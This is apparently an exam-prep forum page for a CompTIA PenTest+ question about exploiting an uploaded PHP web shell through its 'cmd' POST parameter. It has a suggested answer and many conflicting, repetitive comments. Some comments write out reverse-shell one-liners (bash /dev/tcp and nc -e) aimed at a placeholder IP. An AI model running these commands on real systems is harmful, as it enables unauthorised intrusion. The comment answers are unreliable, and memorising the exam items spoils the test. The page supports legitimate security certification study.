Deal of The Day! Hurry Up, Grab the Special Discount - Save 25% - Ends In 00:00:00 Coupon code: SAVE25
Welcome to Pass4Success

- Free Preparation Discussions
Mail Us support@pass4success.com
Location US
Mob_nav_barsMENU

CompTIA Exam PT0-002 Topic 1 Question 53 Discussion

Actual exam question for CompTIA's PT0-002 exam
Question #: 53
Topic #: 1
[All PT0-002 Questions]

During an engagement, a penetration tester was able to upload to a server a PHP file with the following content:

Which of the following commands should the penetration tester run to successfully achieve RCE?

Show Suggested Answer Hide Answer
Suggested Answer: A

The PHP file uploaded by the penetration tester allows for Remote Code Execution (RCE) by executing the command supplied through the cmd POST parameter. To exploit this, the penetration tester needs to send a POST request to the PHP file with the command they want to execute.

Among the given options, Option A is the most suitable for achieving RCE:

It uses Python's requests library to send a POST request, which is appropriate because the PHP script expects data through the POST method.

The data parameter in the requests.post function is correctly formatted as a dictionary, which is the expected format for sending form data in POST requests. It includes the key cmd with the value id, which is a common command used to display the current user ID and group ID.

The only minor issue with Option A is that it prints the entire response object, which includes not just the response content but also metadata like status code and headers. To print just the response content (which would include the output of the id command), appending .text to the requests.post call would be more precise, but this is a small detail and does not affect the execution of the command.

The other options have various issues:

Option B is close but has a syntax error in the data argument. It uses parentheses () instead of curly braces {} for the dictionary, and also lacks the .text at the end to print the response content.

Options C and D use the requests.get method, which is not suitable in this scenario because the PHP script is expecting data through the POST method, not the GET method. Additionally, Option D has a syntax error similar to Option B.


by Glen at Apr 10, 2024, 02:59 AM

Limited Time Offer

25%

Off

Get Premium PT0-002 Questions as Interactive Web-Based Practice Test or PDF

Contribute your Thoughts:

Submit Cancel
Nguyet
10 months ago
Mila: Option C looks like it would allow the penetration tester to execute arbitrary commands, achieving RCE.
upvoted 0 times
...
Marla
10 months ago
Marla: Can you explain why you think Option C is the right choice?
upvoted 0 times
...
Mila
10 months ago
Mila: I disagree, I believe the correct command is Option C.
upvoted 0 times
...
Nida
10 months ago
Catalina: Option B seems like it would execute the command stored in $_POST['cmd'], leading to remote code execution.
upvoted 0 times
...
Catalina
10 months ago
Why do you say that? What's your reasoning?
upvoted 0 times
...
Serina
11 months ago
I think the correct command to run is Option B.
upvoted 0 times
...
Veda
11 months ago
Option C looks like it would allow the penetration tester to execute arbitrary commands, achieving RCE.
upvoted 0 times
...
Margart
11 months ago
Can you explain why you think Option C is the right choice?
upvoted 0 times
...
Ciara
11 months ago
I disagree, I believe the correct command is Option C.
upvoted 0 times
...
Nickie
11 months ago
Option B seems like it would execute the command stored in $_POST['cmd'], leading to remote code execution.
upvoted 0 times
...
Shelton
11 months ago
Why do you say that? What's your reasoning?
upvoted 0 times
...
Ernie
11 months ago
I think the correct command to run is Option B.
upvoted 0 times
...
Sylvie
1 years ago
Hmm, I'm not sure any of these options are quite right. We need to think outside the box here. Maybe something like 'python -c 'import os; os.system("whoami")'' or 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'.
upvoted 0 times
Renato
10 months ago
Good idea. Let's give it a try.
upvoted 0 times
...
Jeffrey
10 months ago
That won't work. Let's try 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' instead.
upvoted 0 times
...
Cristal
11 months ago
Option D
upvoted 0 times
...
...
Jackie
1 years ago
I bet the answer is going to be something like 'nc' or 'netcat' to establish a reverse shell. That's the go-to for RCE, right?
upvoted 0 times
...
Justine
1 years ago
Hmm, let me think about this. The PHP file is executing whatever command is passed in the 'cmd' parameter via POST. So we need to find a command that will give us remote access.
upvoted 0 times
...
Brittni
1 years ago
You know, I bet the answer is something like 'nc -e /bin/bash 10.10.10.10 4444'. That's a classic. But then again, they might be trying to throw us off with something more obscure.
upvoted 0 times
...
Theron
1 years ago
Yeah, this is a classic RCE scenario. I'm guessing the answer has something to do with the 'system' function in the PHP file.
upvoted 0 times
...
Ahmed
1 years ago
Wow, this is a pretty straightforward question. The PHP file they were able to upload allows remote command execution (RCE), so we just need to figure out the correct command to run.
upvoted 0 times
...
Willie
1 years ago
I don't know, guys. This feels a little too easy. The real challenge is going to be figuring out which command will give us the most useful information without tipping our hand. We need to be surgical here.
upvoted 0 times
Alaine
11 months ago
I think we should go with Option D. It might reveal the most valuable information without drawing attention.
upvoted 0 times
...
Lorean
12 months ago
Let's stick with Option C for now and see what we can uncover.
upvoted 0 times
...
Owen
12 months ago
Option B might be the best bet to gather the necessary information discreetly.
upvoted 0 times
...
Sage
12 months ago
What if we try Option D? It could give us the insight we need without causing any issues.
upvoted 0 times
...
Rosita
12 months ago
I agree, Option C could provide valuable data without alerting anyone.
upvoted 0 times
...
Anisha
12 months ago
I think Option B might give us more useful information without raising any suspicions.
upvoted 0 times
...
Shantay
12 months ago
Let's go with Option A. It seems like the safest choice for now.
upvoted 0 times
...
...
Amber
1 years ago
Haha, 'cmd'? Really? That's just begging to be exploited. I bet the answer is something like 'whoami' or 'ls -la'. Let's see if any of these options are that obvious.
upvoted 0 times
...
Alesia
1 years ago
I agree, this question really separates the script kiddies from the real pros. Let's see, the PHP code they've provided looks like it's just executing whatever command is passed to it via the 'cmd' POST parameter. Hmm, this is going to be a tough one.
upvoted 0 times
...
Bernardo
1 years ago
Wow, this question is a real challenge! I'm glad they're testing us on something practical like RCE (Remote Code Execution) attacks. This is the kind of stuff we need to know to be effective penetration testers.
upvoted 0 times
...

Save Cancel